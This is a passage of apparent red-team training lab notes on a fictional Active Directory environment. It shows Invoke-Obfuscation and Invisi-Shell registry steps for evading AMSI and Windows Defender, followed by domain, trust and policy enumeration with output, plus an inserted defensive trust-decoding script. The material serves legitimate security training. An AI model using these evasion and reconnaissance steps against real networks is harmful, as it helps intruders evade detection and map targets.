obfuscate the entire script, including any AMSI bypass code, making it difficult for Windows Defender and
other security tools to detect malicious content.

Invoke-Obfuscation provides various obfuscation techniques, such as encoding, string manipulation, and
variable renaming, to transform the script into a form that is challenging for signature-based detection to
analyze.
Usage

Apply Obfuscation: use Invoke-Obfuscation to obfuscate the entire script, ensuring it can evade both
AMSI and Windows Defender.
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

Lab Environment
Assume Breach Execution Cycle
Insider Attack Simulation is an important part of the Assume Breach Execution Cycle. In the course, we
are going to use the Assume Breach Methodology on an Active Directory environment and utilize the
internal access available to an adversary to perform further attacks. Here is a detailed look at the Assume
Breach Execution Cycle

Red Teaming
Red teaming involves simulating real-world attacks to test the effectiveness of an organization's security
measures. In this phase, we identify vulnerabilities and weaknesses in the Active Directory environment
by mimicking the actions of a malicious actor.

Insider Attack Simulation


This phase focuses on simulating attacks that originate from within the organization. Using the Assume
Breach Methodology, we assume that the adversary already has a foothold in the network. This simulation
helps to understand the impact of insider threats and the potential damage that can be inflicted.

Blue Teaming
Blue teaming is the defensive counterpart to red teaming. In this phase, security teams work to detect,
respond to, and mitigate the attacks simulated by the red team. The goal is to improve the organization’s
defense mechanisms and incident response strategies.

Execute Post Breach


In the post-breach phase, actions are taken based on the findings from the red and blue team exercises.
This includes remediation of identified vulnerabilities, strengthening security controls, and enhancing
detection and response capabilities.

Monitor Emerging Threats


Continuous monitoring for emerging threats is crucial to maintaining a robust security posture. This phase
involves staying updated on the latest threat intelligence and adapting security strategies to counter new
attack vectors.

Wargame Exercises
Wargaming involves conducting regular exercises to simulate various attack scenarios. These exercises
help in preparing the organization for potential breaches and improving the coordination between
different security teams.

By following the Assume Breach Execution Cycle, organizations can better prepare for and respond to
security incidents, ensuring a comprehensive approach to cybersecurity.

Target Environment
Moneycorp
In this class, we are targeting the Active Directory environment of a fictional financial services company
called 'Moneycorp'. The lab environment is designed to provide realistic and challenging scenarios for
practicing red team techniques.

Moneycorp Environment Details


• Operating Systems:

o Fully patched Server 2022 machines with Windows Defender.

o Server 2016 Forest Functional Level.

• Active Directory Structure:

o Multiple forests.

o Multiple domains.

• Network Configuration:

o Minimal firewall usage to focus more on understanding and practicing concepts rather
than firewall configurations.

Lab Access

• Log on to Moneycorp AD Lab for accessing the lab environment.

By simulating an environment similar to that of a real-world financial services company, the lab provides
an excellent platform for learning and applying the Assume Breach Methodology and various red team
techniques on Active Directory.

Lab Tools and Resources


We're provided access to the lab as a very low privileged domain user (STUDENT163) and access to a
domain-joined machine (DCORP-STD163). All the tools required for the lab are provided in the directory
C:\AD\Tools\. This ensures that you have immediate access to all necessary resources for performing the
exercises and practicing the techniques taught in the course.

IP Addresses
In scope: 172.16.1.0/24 - 172.16.17.0/24

Everything else is NOT in scope. The IP address of the student machine is 172.16.100.163.

C:\Users\student163>ipconfig

Windows IP Configuration

Ethernet adapter Ethernet 5:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::7b8a:9cbf:fb30:de74%18
IPv4 Address. . . . . . . . . . . : 172.16.100.163
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.100.254

Insider attack simulation phase

This framework outlines a specific methodology for conducting red team operations, focusing on various
stages of the attack lifecycle without allocating time specifically for reconnaissance.

Domain Enumeration
In this phase, the red team focuses on identifying and mapping out the target organization's domain
infrastructure, including domain controllers, domains, trusts, users, groups, and other resources. This
information is crucial for understanding the environment and planning further attacks.

Local Privilege Escalation


Here, the red team seeks to exploit vulnerabilities in individual systems to escalate privileges and gain
higher levels of access. This could involve exploiting misconfigurations, vulnerabilities, or weaknesses in
local security settings.

Admin Recon
This stage involves reconnaissance specifically focused on administrative users and their privileges within
the network. The red team aims to gather information about administrative accounts, their roles,
responsibilities, and access rights to target high-value accounts for further exploitation.

Lateral Movement
In this phase, the red team explores techniques and avenues for moving laterally across the network from
one compromised system to another. This may involve leveraging stolen credentials, exploiting trust
relationships, or abusing misconfigurations to gain access to additional systems.

Domain Admin Privileges


Obtaining domain admin privileges is a key objective for the red team as it provides full control over the
entire network. This stage involves targeting domain controllers, domain admin accounts, or other critical
infrastructure to achieve this level of access.

Cross Forest Trust Attacks


Here, the red team exploits trust relationships between different domains or forests within the target
organization to expand their foothold and gain access to additional resources or domains.

Persist and Exfiltrate
Finally, the red team focuses on maintaining persistence in the compromised environment and exfiltrating
sensitive data. This involves establishing backdoors, creating persistence mechanisms, and securely
extracting valuable information from the target network.

Active Directory Enumeration
Active Directory enumeration is a crucial phase in the Certified Red Team Professional (CRTP) lab,
providing essential insights into the target environment's structure, users, groups, and permissions. This
chapter outlines the tools and techniques utilized during enumeration, focusing on gathering critical
information for subsequent stages of the red team engagement.

Tools for Enumeration


1. Active Directory PowerShell module:

o The Active Directory PowerShell module offers a comprehensive set of cmdlets for
managing and querying Active Directory.

o Utilizing this module allows red teamers to retrieve detailed information about users,
groups, computers, and organizational units within the domain.

o Documentation and resources for utilizing this module can be found here and here.

2. BloodHound (C# and PowerShell Collectors):

o BloodHound is a powerful tool for visualizing and analyzing Active Directory relationships,
trust paths, and potential attack paths.

o Red teamers leverage both C# and PowerShell collectors to gather data on user accounts,
group memberships, permissions, and trust relationships.

o BloodHound aids in identifying security risks, misconfigurations, and high-impact attack
vectors within the AD environment. The repository for BloodHound can be accessed here.

3. PowerView (PowerShell):

o PowerView, a component of the PowerSploit framework, is specifically designed for
Active Directory reconnaissance.

o This PowerShell tool provides a range of cmdlets for querying AD information, including
domain controller enumeration, trust enumeration, and user attribute searching.

o Red teamers can utilize PowerView to gather comprehensive data for assessing the AD
environment's security posture. PowerView's script can be found here.

4. SharpView (C#):

o SharpView is a C# implementation of PowerView, offering similar functionalities for Active
Directory enumeration.

o While it lacks support for filtering using the pipeline, SharpView provides robust
capabilities for querying AD information efficiently.

o Red teamers can leverage SharpView alongside other tools to gather detailed insights into
the target AD environment. The repository for SharpView can be accessed here.

Enumeration Techniques
During the enumeration phase, red teamers employ various techniques to gather comprehensive
information about the Active Directory environment:

1. User Enumeration: Identify existing user accounts, their attributes, group memberships, and
permissions within the domain.

2. Group Enumeration: Enumerate domain groups, including built-in groups, security groups,
distribution groups, and their respective memberships.

3. Computer Enumeration: Discover domain-joined computers, their operating systems, roles, and
configurations.

4. Organizational Unit (OU) Enumeration: Explore the organizational structure of the domain,
including OUs, their hierarchy, and associated permissions.

Loading the Active directory Module


We open a PowerShell session with Invisi-Shell. Since we don't have administrative privileges, we will run
the RunWithRegistryNonAdmin.bat file to load the PowerShell session. Once a PowerShell session is
opened, we import the Active Directory module. We don't need RSAT installed for this.

C:\Users\student163>C:\Ad\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\Users\student163>set COR_ENABLE_PROFILING=1

C:\Users\student163>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\Users\student163>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\student163> cd C:\Ad\Tools\ADModule-master\
PS C:\Ad\Tools\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\Ad\Tools\ADModule-master> Import-Module .\ActiveDirectory\ActiveDirectory.psd1

Loading the PowerView script

C:\Users\student163>C:\Ad\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\Users\student163>set COR_ENABLE_PROFILING=1

C:\Users\student163>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\Users\student163>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\student163> . C:\Ad\Tools\PowerView.ps1

Domain Enumeration
Using AD Module
Getting Domain Details
PS C:\Ad\Tools\ADModule-master> Get-ADDomain

AllowedDNSSuffixes : {}
ChildDomains : {us.dollarcorp.moneycorp.local}
ComputersContainer : CN=Computers,DC=dollarcorp,DC=moneycorp,DC=local
DeletedObjectsContainer : CN=Deleted Objects,DC=dollarcorp,DC=moneycorp,DC=local
DistinguishedName : DC=dollarcorp,DC=moneycorp,DC=local
DNSRoot : dollarcorp.moneycorp.local
DomainControllersContainer : OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-719815819-3726368948-3917688648
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=dollarcorp,DC=moneycorp,DC=local
Forest : moneycorp.local
InfrastructureMaster : dcorp-dc.dollarcorp.moneycorp.local
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local}
LostAndFoundContainer : CN=LostAndFound,DC=dollarcorp,DC=moneycorp,DC=local
ManagedBy :
Name : dollarcorp
NetBIOSName : dcorp
ObjectClass : domainDNS
ObjectGUID : ae5db372-9c80-40c4-a198-0f655123a9d4
ParentDomain : moneycorp.local
PDCEmulator : dcorp-dc.dollarcorp.moneycorp.local
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=dollarcorp,DC=moneycorp,DC=local
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {dcorp-dc.dollarcorp.moneycorp.local}
RIDMaster : dcorp-dc.dollarcorp.moneycorp.local
SubordinateReferences : {DC=us,DC=dollarcorp,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=dollarcorp,DC=moneycorp,DC=local}
SystemsContainer : CN=System,DC=dollarcorp,DC=moneycorp,DC=local
UsersContainer : CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

Getting Details of the parent Domain


PS C:\Ad\Tools\ADModule-master> Get-ADDomain -Identity Moneycorp.local

AllowedDNSSuffixes : {}
ChildDomains : {dollarcorp.moneycorp.local}
ComputersContainer : CN=Computers,DC=moneycorp,DC=local
DeletedObjectsContainer : CN=Deleted Objects,DC=moneycorp,DC=local
DistinguishedName : DC=moneycorp,DC=local
DNSRoot : moneycorp.local
DomainControllersContainer : OU=Domain Controllers,DC=moneycorp,DC=local
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-335606122-960912869-3279953914
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=moneycorp,DC=local
Forest : moneycorp.local
InfrastructureMaster : mcorp-dc.moneycorp.local
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=moneycorp,DC=local}
LostAndFoundContainer : CN=LostAndFound,DC=moneycorp,DC=local
ManagedBy :
Name : moneycorp
NetBIOSName : mcorp
ObjectClass : domainDNS
ObjectGUID : a497ae8b-714e-432f-9b9e-dae80f125ed0
ParentDomain :
PDCEmulator : mcorp-dc.moneycorp.local
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=moneycorp,DC=local
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {mcorp-dc.moneycorp.local}
RIDMaster : mcorp-dc.moneycorp.local
SubordinateReferences : {DC=dollarcorp,DC=moneycorp,DC=local,
DC=ForestDnsZones,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=moneycorp,DC=local,
CN=Configuration,DC=moneycorp,DC=local}
SystemsContainer : CN=System,DC=moneycorp,DC=local
UsersContainer : CN=Users,DC=moneycorp,DC=local

Getting Details of the trusting Domain


PS C:\Ad\Tools\ADModule-master> Get-ADDomain -Identity eurocorp.local
AllowedDNSSuffixes : {}
ChildDomains : {eu.eurocorp.local}
ComputersContainer : CN=Computers,DC=eurocorp,DC=local
DeletedObjectsContainer : CN=Deleted Objects,DC=eurocorp,DC=local
DistinguishedName : DC=eurocorp,DC=local
DNSRoot : eurocorp.local
DomainControllersContainer : OU=Domain Controllers,DC=eurocorp,DC=local
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-3333069040-3914854601-3606488808
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=eurocorp,DC=local
Forest : eurocorp.local
InfrastructureMaster : eurocorp-dc.eurocorp.local
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=eurocorp,DC=local}
LostAndFoundContainer : CN=LostAndFound,DC=eurocorp,DC=local
ManagedBy :
Name : eurocorp
NetBIOSName : ecorp
ObjectClass : domainDNS
ObjectGUID : 49aead6b-6265-4473-9469-efe7df77b480
ParentDomain :
PDCEmulator : eurocorp-dc.eurocorp.local
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=eurocorp,DC=local
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {eurocorp-dc.eurocorp.local}
RIDMaster : eurocorp-dc.eurocorp.local
SubordinateReferences : {DC=eu,DC=eurocorp,DC=local,
DC=ForestDnsZones,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eurocorp,DC=local,
CN=Configuration,DC=eurocorp,DC=local}
SystemsContainer : CN=System,DC=eurocorp,DC=local
UsersContainer : CN=Users,DC=eurocorp,DC=local

Getting Domain SID


PS C:\Ad\Tools\ADModule-master> (Get-ADDomain).DomainSID.value
S-1-5-21-719815819-3726368948-3917688648
PS C:\Ad\Tools\ADModule-master> (Get-ADDomain -Identity moneycorp.local).DomainSID.value
S-1-5-21-335606122-960912869-3279953914
PS C:\Ad\Tools\ADModule-master> (Get-ADDomain -Identity eurocorp.local).DomainSID.value
S-1-5-21-3333069040-3914854601-3606488808

Getting Domain Controllers information


PS C:\Ad\Tools\ADModule-master> Get-ADDomainController

ComputerObjectDN : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
DefaultPartition : DC=dollarcorp,DC=moneycorp,DC=local
Domain : dollarcorp.moneycorp.local
Enabled : True
Forest : moneycorp.local
HostName : dcorp-dc.dollarcorp.moneycorp.local
InvocationId : 5022a908-f20e-4aca-8c91-f58f4254a9bc
IPv4Address : 172.16.2.1
IPv6Address :
IsGlobalCatalog : True
IsReadOnly : False
LdapPort : 389
Name : DCORP-DC
NTDSSettingsObjectDN : CN=NTDS Settings,CN=DCORP-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=moneycorp,DC=local
OperatingSystem : Windows Server 2022 Standard
OperatingSystemHotfix :
OperatingSystemServicePack :
OperatingSystemVersion : 10.0 (20348)
OperationMasterRoles : {PDCEmulator, RIDMaster, InfrastructureMaster}
Partitions : {DC=DomainDnsZones,DC=dollarcorp,DC=moneycorp,DC=local,
DC=dollarcorp,DC=moneycorp,DC=local,
DC=ForestDnsZones,DC=moneycorp,DC=local,
CN=Schema,CN=Configuration,DC=moneycorp,DC=local...}
ServerObjectDN : CN=DCORP-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=moneycorp,DC=local
ServerObjectGuid : 87b4d65d-a24d-47ea-a3d4-eeba1e58a5f0
Site : Default-First-Site-Name
SslPort : 636

PS C:\Ad\Tools\ADModule-master> Get-ADDomainController -DomainName moneycorp.local -Discover

Domain : moneycorp.local
Forest : moneycorp.local
HostName : {mcorp-dc.moneycorp.local}
IPv4Address : 172.16.1.1
IPv6Address :
Name : MCORP-DC
Site : Default-First-Site-Name

PS C:\Ad\Tools\ADModule-master> Get-ADDomainController -DomainName eurocorp.local -Discover

Domain : eurocorp.local
Forest : eurocorp.local
HostName : {eurocorp-dc.eurocorp.local}
IPv4Address : 172.16.15.1
IPv6Address :
Name : EUROCORP-DC
Site : Default-First-Site-Name

Getting Trust details

In an AD environment, a trust is a relationship between two domains or forests which allows users of one
domain or forest to access resources in the other domain or forest.
Trusts can be automatic (parent-child, same forest etc.) or established (forest, external).
Trusted Domain Objects (TDOs) represent the trust relationships in a domain.

Trust Direction

• One-way Trust - Unidirectional - Users in the trusted domain can access resources in the trusting
domain, but the converse is not true.
• Two-way Trust - Bidirectional - Users in both domains can access resources in the other
domain.

Trust Transitivity

• Transitive - A trust is transitive when it can be extended to establish trust relationships with other
domains. All the default intra-forest trust relationships (tree-root, parent-child) between domains
within the same forest are transitive two-way trusts.
• Non-Transitive - A trust is non-transitive when it cannot be extended to establish trust relationships
with other domains. This can be one-way or two-way.

Types of Trusts

• Parent-Child trusts - Automatically created between a new domain and the domain that
precedes it in the namespace hierarchy whenever a new domain is added to the hierarchy. The
trust is always two-way transitive.
• Shortcut trusts - Used to reduce access times in complex trust scenarios. Can be one-way or two-
way transitive.
• External trusts - Established between two domains in two different forests when the forests do
not have a trust relationship. The trust can be one-way or two-way and is non-transitive.
• Forest trusts - Established between the forest root domains of two forests. It cannot be extended
to a third forest implicitly. The trust can be one-way or two-way.

PS C:\Ad\Tools\ADModule-master> Get-ADTrust -Filter *

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=moneycorp.local,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : moneycorp.local
ObjectClass : trustedDomain
ObjectGUID : 01c3b68d-520b-44d8-8e7f-4c10927c2b98
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=dollarcorp,DC=moneycorp,DC=local
Target : moneycorp.local
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=us.dollarcorp.moneycorp.local,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : us.dollarcorp.moneycorp.local
ObjectClass : trustedDomain
ObjectGUID : 3edb04a9-d634-4038-beed-3c057743853f
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=dollarcorp,DC=moneycorp,DC=local
Target : us.dollarcorp.moneycorp.local
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=eurocorp.local,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
ForestTransitive : False
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : eurocorp.local
ObjectClass : trustedDomain
ObjectGUID : d4d64a77-63be-4d77-93c2-6524e73d306d
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=dollarcorp,DC=moneycorp,DC=local
Target : eurocorp.local
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
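To make the raw TrustAttributes values above (32 and 4) readable and to review each trust from a defender's angle, here is an added PowerShell example that is not part of the lab notes, the AD module or PowerView. It decodes the bitmask into the flag names PowerView prints and runs on constructed objects copied from the Get-ADTrust output above; the function names ConvertFrom-TrustAttributes and Get-TrustSummary are my own.

```powershell
# Added example (not from the lab notes): decode Get-ADTrust's TrustAttributes bitmask
# and summarise each trust. Runs offline on constructed sample objects shaped like the
# Get-ADTrust output; pipe real "Get-ADTrust -Filter *" output in to use it live.

# Flag values from MS-ADTS (trustAttributes). PowerView prints the same names.
$TrustAttributeFlags = [ordered]@{
    NON_TRANSITIVE                           = 0x1
    UPLEVEL_ONLY                             = 0x2
    FILTER_SIDS                              = 0x4    # a.k.a. QUARANTINED_DOMAIN
    FOREST_TRANSITIVE                        = 0x8
    CROSS_ORGANIZATION                       = 0x10
    WITHIN_FOREST                            = 0x20
    TREAT_AS_EXTERNAL                        = 0x40
    USES_RC4_ENCRYPTION                      = 0x80
    CROSS_ORGANIZATION_NO_TGT_DELEGATION     = 0x200
    PIM_TRUST                                = 0x400
    CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION = 0x800
}

function ConvertFrom-TrustAttributes {
    param([Parameter(Mandatory)][int]$Value)
    # Return the name of every bit that is set: 32 -> WITHIN_FOREST, 4 -> FILTER_SIDS
    $names = foreach ($entry in $TrustAttributeFlags.GetEnumerator()) {
        if (($Value -band $entry.Value) -ne 0) { $entry.Key }
    }
    if (-not $names) { return @('NONE') }
    return @($names)
}

function Get-TrustSummary {
    param([Parameter(Mandatory, ValueFromPipeline)]$Trust)
    process {
        $flags       = ConvertFrom-TrustAttributes -Value $Trust.TrustAttributes
        $intraForest = $flags -contains 'WITHIN_FOREST'
        $forestTrust = $flags -contains 'FOREST_TRANSITIVE'
        # A trust is transitive unless NON_TRANSITIVE is set.
        $transitive  = -not ($flags -contains 'NON_TRANSITIVE')
        # SID filtering: quarantine applies to external trusts, forest-aware filtering to
        # forest trusts. Intra-forest trusts never filter SIDs, so the forest, not the
        # domain, is the security boundary.
        $sidFiltered = if ($intraForest) { $false }
                       elseif ($forestTrust) { [bool]$Trust.SIDFilteringForestAware }
                       else { [bool]$Trust.SIDFilteringQuarantined }
        $kind = if ($intraForest) { 'Intra-forest' }
                elseif ($forestTrust) { 'Forest' }
                else { 'External' }
        $note = if (-not $intraForest -and -not $sidFiltered) {
                    'REVIEW: cross-forest trust without SID filtering'
                } elseif ($intraForest) {
                    'Info: no SID filtering inside a forest by design'
                } else { 'OK' }
        [pscustomobject]@{
            Source      = $Trust.Source
            Target      = $Trust.Target
            Kind        = $kind
            Direction   = $Trust.Direction
            Transitive  = $transitive
            SIDFiltered = $sidFiltered
            Flags       = ($flags -join ',')
            Note        = $note
        }
    }
}

# Constructed sample objects mirroring the three trusts in the output above.
$sampleTrusts = @(
    [pscustomobject]@{ Source='DC=dollarcorp,DC=moneycorp,DC=local'; Target='moneycorp.local';
                       Direction='BiDirectional'; TrustAttributes=32;
                       SIDFilteringQuarantined=$false; SIDFilteringForestAware=$false }
    [pscustomobject]@{ Source='DC=dollarcorp,DC=moneycorp,DC=local'; Target='us.dollarcorp.moneycorp.local';
                       Direction='BiDirectional'; TrustAttributes=32;
                       SIDFilteringQuarantined=$false; SIDFilteringForestAware=$false }
    [pscustomobject]@{ Source='DC=dollarcorp,DC=moneycorp,DC=local'; Target='eurocorp.local';
                       Direction='BiDirectional'; TrustAttributes=4;
                       SIDFilteringQuarantined=$true; SIDFilteringForestAware=$false }
)

$sampleTrusts | Get-TrustSummary | Format-Table -AutoSize
# Live data instead of the sample: Get-ADTrust -Filter * | Get-TrustSummary | Format-Table -AutoSize
```

For the three trusts above this reports the two intra-forest trusts as transitive without SID filtering and the eurocorp.local external trust as non-transitive with SID filtering enabled (TrustAttributes 4), matching the FILTER_SIDS name PowerView shows later.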

Get Forest Details


PS C:\Ad\Tools\ADModule-master> Get-ADForest
ApplicationPartitions : {DC=ForestDnsZones,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=us,DC=dollarcorp,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=dollarcorp,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=moneycorp,DC=local}
CrossForestReferences : {}
DomainNamingMaster : mcorp-dc.moneycorp.local
Domains : {dollarcorp.moneycorp.local, moneycorp.local,
us.dollarcorp.moneycorp.local}
ForestMode : Windows2016Forest
GlobalCatalogs : {mcorp-dc.moneycorp.local, dcorp-dc.dollarcorp.moneycorp.local,
us-dc.us.dollarcorp.moneycorp.local}
Name : moneycorp.local
PartitionsContainer : CN=Partitions,CN=Configuration,DC=moneycorp,DC=local
RootDomain : moneycorp.local
SchemaMaster : mcorp-dc.moneycorp.local
Sites : {Default-First-Site-Name}
SPNSuffixes : {}
UPNSuffixes : {}

PS C:\Ad\Tools\ADModule-master> Get-ADForest -Identity eurocorp.local

ApplicationPartitions : {DC=ForestDnsZones,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eurocorp,DC=local}
CrossForestReferences : {}
DomainNamingMaster : eurocorp-dc.eurocorp.local
Domains : {eurocorp.local, eu.eurocorp.local}
ForestMode : Windows2016Forest
GlobalCatalogs : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
Name : eurocorp.local
PartitionsContainer : CN=Partitions,CN=Configuration,DC=eurocorp,DC=local
RootDomain : eurocorp.local
SchemaMaster : eurocorp-dc.eurocorp.local
Sites : {Default-First-Site-Name}
SPNSuffixes : {}
UPNSuffixes : {}

Getting Domain SID (PowerView)


PS C:\Users\student163> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648
PS C:\Users\student163> Get-DomainSID -Domain moneycorp.local
S-1-5-21-335606122-960912869-3279953914
PS C:\Users\student163> Get-DomainSID -Domain eurocorp.local
S-1-5-21-3333069040-3914854601-3606488808

Getting Domain password policy


PS C:\Ad\Tools\ADModule-master> Get-ADDefaultDomainPasswordPolicy

ComplexityEnabled : True
DistinguishedName : DC=dollarcorp,DC=moneycorp,DC=local
LockoutDuration : 00:10:00
LockoutObservationWindow : 00:10:00
LockoutThreshold : 0
MaxPasswordAge : 42.00:00:00
MinPasswordAge : 1.00:00:00
MinPasswordLength : 7
objectClass : {domainDNS}
objectGuid : ae5db372-9c80-40c4-a198-0f655123a9d4
PasswordHistoryCount : 24
ReversibleEncryptionEnabled : False

PS C:\Ad\Tools\ADModule-master> Get-ADDefaultDomainPasswordPolicy -Identity moneycorp.local

ComplexityEnabled : True
DistinguishedName : DC=moneycorp,DC=local
LockoutDuration : 00:10:00
LockoutObservationWindow : 00:10:00
LockoutThreshold : 0
MaxPasswordAge : 42.00:00:00
MinPasswordAge : 1.00:00:00
MinPasswordLength : 7
objectClass : {domainDNS}
objectGuid : a497ae8b-714e-432f-9b9e-dae80f125ed0
PasswordHistoryCount : 24
ReversibleEncryptionEnabled : False

PS C:\Ad\Tools\ADModule-master> Get-ADDefaultDomainPasswordPolicy -Identity eurocorp.local

ComplexityEnabled : True
DistinguishedName : DC=eurocorp,DC=local
LockoutDuration : 00:10:00
LockoutObservationWindow : 00:10:00
LockoutThreshold : 0
MaxPasswordAge : 42.00:00:00
MinPasswordAge : 1.00:00:00
MinPasswordLength : 7
objectClass : {domainDNS}
objectGuid : 49aead6b-6265-4473-9469-efe7df77b480
PasswordHistoryCount : 24
ReversibleEncryptionEnabled : False

Using PowerView
Getting Domain Details
PS C:\Users\student163> Get-Domain

Forest : moneycorp.local
DomainControllers : {dcorp-dc.dollarcorp.moneycorp.local}
Children : {us.dollarcorp.moneycorp.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent : moneycorp.local
PdcRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
RidRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
InfrastructureRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
Name : dollarcorp.moneycorp.local

Getting Details of the parent Domain


PS C:\Users\student163> Get-Domain -Domain moneycorp.local

Forest : moneycorp.local
DomainControllers : {mcorp-dc.moneycorp.local}
Children : {dollarcorp.moneycorp.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : mcorp-dc.moneycorp.local
RidRoleOwner : mcorp-dc.moneycorp.local
InfrastructureRoleOwner : mcorp-dc.moneycorp.local
Name : moneycorp.local

Getting Details of the trusted domain


PS C:\Users\student163> Get-Domain -Domain eurocorp.local

Forest : eurocorp.local
DomainControllers : {eurocorp-dc.eurocorp.local}
Children : {eu.eurocorp.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : eurocorp-dc.eurocorp.local
RidRoleOwner : eurocorp-dc.eurocorp.local
InfrastructureRoleOwner : eurocorp-dc.eurocorp.local
Name : eurocorp.local

Getting Domain Controllers information


PS C:\Users\student163> Get-DomainController

Forest : moneycorp.local
CurrentTime : 6/12/2024 12:13:43 PM
HighestCommittedUsn : 1624954
OSVersion : Windows Server 2022 Standard
Roles : {PdcRole, RidRole, InfrastructureRole}
Domain : dollarcorp.moneycorp.local
IPAddress : 172.16.2.1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {83cb5211-27b5-41d1-afcf-6e9fbd30de06, f06c66a3-2e50-4f42-8078-
d022cbf1db27}
OutboundConnections : {cb4a4e84-ab09-4e4a-8365-a28ffac2d701, 5cc72b32-ff79-4bb0-8599-
e8be4520eeb3}
Name : dcorp-dc.dollarcorp.moneycorp.local
Partitions : {CN=Configuration,DC=moneycorp,DC=local,
CN=Schema,CN=Configuration,DC=moneycorp,DC=local,
DC=ForestDnsZones,DC=moneycorp,DC=local,
